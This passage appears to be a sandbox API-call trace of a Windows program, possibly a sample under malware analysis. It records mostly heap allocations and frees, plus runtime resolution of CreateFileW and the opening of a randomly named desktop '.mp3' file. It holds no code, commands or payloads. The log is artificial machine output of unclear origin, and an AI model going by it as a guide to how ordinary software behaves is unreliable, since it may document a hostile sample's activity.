dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.753] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0123.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0123.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca898, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.754] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0123.754] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\kltew7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0123.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.756] FreeLibrary (hLibModule=0x772d0000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.758] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.758] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0123.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.759] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0123.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0123.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0123.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0123.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0123.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0123.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0123.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0123.760] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0123.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0123.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 